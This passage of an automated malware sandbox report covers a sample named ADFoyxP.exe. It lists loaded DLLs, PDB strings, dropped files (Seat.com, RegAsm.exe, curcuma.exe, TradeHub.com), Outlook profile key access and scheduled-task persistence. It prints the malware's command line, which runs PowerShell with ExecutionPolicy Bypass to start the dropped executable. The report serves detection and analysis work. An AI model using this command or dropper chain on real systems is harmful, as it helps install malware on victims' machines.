Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: cryptnet.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: devenum.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: msdmo.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ADFoyxP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\scoped_dir8680_1554559384
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_8680_1352400022
Source: ADFoyxP.exeStatic file information: File size 3665550 > 1048576
Source: ADFoyxP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ad_prod.pdb\36C00AF489401A26639ABBA698DE76062* source: curcuma.exe, 00000025.00000003.1706127726.0000012CDEE4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: curcuma.exe, 00000025.00000003.1914137812.0000012CDEE83000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665087028.0000012CDEE65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: K\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbB source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\Local State source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local Statees source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: FC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\crobat\DCG source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000001A.00000000.1139585263.0000000000502000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: ntdll.pdbUGP source: curcuma.exe, 00000025.00000002.2067051232.0000012CE02AE000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062028723.0000012CDF0B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067503246.0000012CE04AA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070281440.0000012CE10A9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064043968.0000012CDF6BA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2063400094.0000012CDF4B9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068870239.0000012CE0AAC000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070779946.0000012CE12A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067953052.0000012CE06A4000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062689732.0000012CDF2B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071810365.0000012CE16A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069313603.0000012CE0CA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066142942.0000012CDFEA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068427148.0000012CE08AD000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2072299199.0000012CE18A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069784689.0000012CE0EA7000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065673413.0000012CDFCAF000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071296730.0000012CE14A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065176277.0000012CDFAB0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064620170.0000012CDF8B3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066598163.0000012CE00A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local StateB source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local Statev source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: a\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local StateQ source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062Z source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1706127726.0000012CDEE4F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665993469.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705642796.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1704853715.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local State source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE27000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: G\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State0F2 source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: curcuma.exe, 00000025.00000002.2067051232.0000012CE02AE000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062028723.0000012CDF0B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067503246.0000012CE04AA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070281440.0000012CE10A9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064043968.0000012CDF6BA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2063400094.0000012CDF4B9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068870239.0000012CE0AAC000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070779946.0000012CE12A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067953052.0000012CE06A4000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062689732.0000012CDF2B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071810365.0000012CE16A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069313603.0000012CE0CA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066142942.0000012CDFEA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068427148.0000012CE08AD000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2072299199.0000012CE18A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069784689.0000012CE0EA7000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065673413.0000012CDFCAF000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071296730.0000012CE14A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065176277.0000012CDFAB0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064620170.0000012CDF8B3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066598163.0000012CE00A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: x\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: curcuma.exe, 00000025.00000003.1665087028.0000012CDEE82000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbx source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\Local StateLvA source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE27000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000001A.00000000.1139585263.0000000000502000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: winload_prod.pdb@0 source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062* source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665993469.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705642796.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1704853715.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062 source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665993469.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705642796.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1704853715.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local State source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdbs source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ogFiles\0F2\en-US source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: ADFoyxP.exeStatic PE information: real checksum: 0x381fe3 should be: 0x3875ef
Source: curcuma.exe.26.drStatic PE information: real checksum: 0x27934f should be: 0x28b32f
Source: curcuma.exe.26.drStatic PE information: section name: .xdata
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00800315 push cs; retn 007Fh23_2_00800318
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D0DE6 push ecx; ret 23_2_007D0DF9

Persistence and Installation Behavior

barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\353090\Seat.comJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\curcuma.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\353090\Seat.comJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
